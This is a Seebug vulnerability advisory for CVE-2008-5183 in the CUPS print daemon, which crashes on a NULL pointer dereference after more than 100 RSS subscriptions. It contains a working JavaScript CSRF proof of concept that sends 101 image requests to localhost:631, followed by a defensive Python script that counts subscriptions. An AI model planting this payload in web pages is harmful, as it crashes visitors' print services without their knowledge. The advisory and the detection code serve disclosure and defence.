CUPS cupsd RSS Subscription NULL Pointer Dereference Local Denial of Service Vulnerability

2008-12-23T00:00:00
ID SSV:4583
Type seebug
Reporter Root
Modified 2008-12-23T00:00:00

Description

BUGTRAQ ID: 32419 CVE(CAN) ID: CVE-2008-5183

Common Unix Printing System (CUPS) is a general-purpose Unix printing system and a cross-platform printing solution for Unix environments. It is based on the Internet Printing Protocol and provides services for most PostScript and raster printers.

If more than 100 RSS subscriptions are added to the CUPS daemon (/usr/sbin/cupsd), which listens on port 631/tcp by default, a NULL pointer dereference is triggered and the daemon crashes.

Easy Software Products CUPS < 1.3.8 RedHat


RedHat has released a security advisory (RHSA-2008:1029-01) and the corresponding patch: RHSA-2008:1029-01: Moderate: cups security update. Link: https://www.redhat.com/support/errata/RHSA-2008-1029.html

<script>
// make 101 CSRFed requests to CUPS daemon via 'img' tags
// causes CUPS daemon to crash
// by Adrian 'pagvac' Pastor | GNUCITIZEN.org

for(var i=1;i<=101;++i) {
    document.write("<img width=0 height=0 " +
        "src=\"http://localhost:631/admin/?OP=add-rss-subscription&SUBSCRIPTION_NAME=DOS_TEST_" +
        i + "&PRINTER_URI=%23ALL%23&EVENT_JOB_CREATED=on&MAX_EVENTS=20\">");
}
</script>
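A defender-side inventory check, added here as an example and not part of the advisory or of CUPS itself: it parses the daemon's persisted subscription list, singles out rss:// recipients, and warns when the total approaches the 100-subscription limit behind this crash. The file layout and the sample contents below are assumptions modelled on /etc/cups/subscriptions.conf, not a real capture.

```python
"""Inventory cupsd event subscriptions; warn when the count nears the limit behind CVE-2008-5183."""
import re

# cupsd stops accepting subscriptions past this count; the advisory's crash needs more than 100 RSS ones.
MAX_SUBSCRIPTIONS = 100

# Constructed sample modelled on /etc/cups/subscriptions.conf (assumed layout, not a real file):
# one built-in D-Bus subscription plus one RSS subscription named like the PoC's.
SAMPLE_CONF = """\
<Subscription 1>
Events printer-state-changed
Owner root
Recipient dbus://
LeaseDuration 0
NextEventId 1
</Subscription>
<Subscription 2>
Events job-created
Owner root
Recipient rss://DOS_TEST_1?max_events=20
LeaseDuration 0
NextEventId 1
</Subscription>
"""

def parse_subscriptions(text):
    """Return one dict per <Subscription N> block, keyed by the block's attribute names plus 'id'."""
    subs = []
    for block in re.finditer(r"<Subscription (\d+)>\n(.*?)</Subscription>", text, re.S):
        sub = {"id": int(block.group(1))}
        for line in block.group(2).splitlines():
            key, _, value = line.partition(" ")   # "Recipient rss://..." -> ("Recipient", "rss://...")
            sub[key] = value
        subs.append(sub)
    return subs

def rss_subscription_report(text, warn_fraction=0.5):
    """Count subscriptions, list the RSS ones, and flag when the total reaches warn_fraction of the limit."""
    subs = parse_subscriptions(text)
    rss = [s for s in subs if s.get("Recipient", "").startswith("rss://")]
    return {"total": len(subs), "rss": len(rss),
            "rss_recipients": [s["Recipient"] for s in rss],
            "warn": len(subs) >= MAX_SUBSCRIPTIONS * warn_fraction}

def make_sample_conf(n):
    """Constructed: the file as it would look with n RSS subscriptions of the kind the PoC creates."""
    block = ("<Subscription {i}>\nEvents job-created\nOwner root\n"
             "Recipient rss://DOS_TEST_{i}?max_events=20\nLeaseDuration 0\nNextEventId 1\n</Subscription>\n")
    return "".join(block.format(i=i) for i in range(1, n + 1))

if __name__ == "__main__":
    print(rss_subscription_report(SAMPLE_CONF))         # 2 total, 1 RSS, warn False
    print(rss_subscription_report(make_sample_conf(100)))  # 100 total, 100 RSS, warn True
```

On a live system, pass the contents of the real subscriptions.conf to rss_subscription_report and alert on "warn"; a human administrator rarely creates more than a handful of RSS feeds, so dozens named alike is a signal worth investigating.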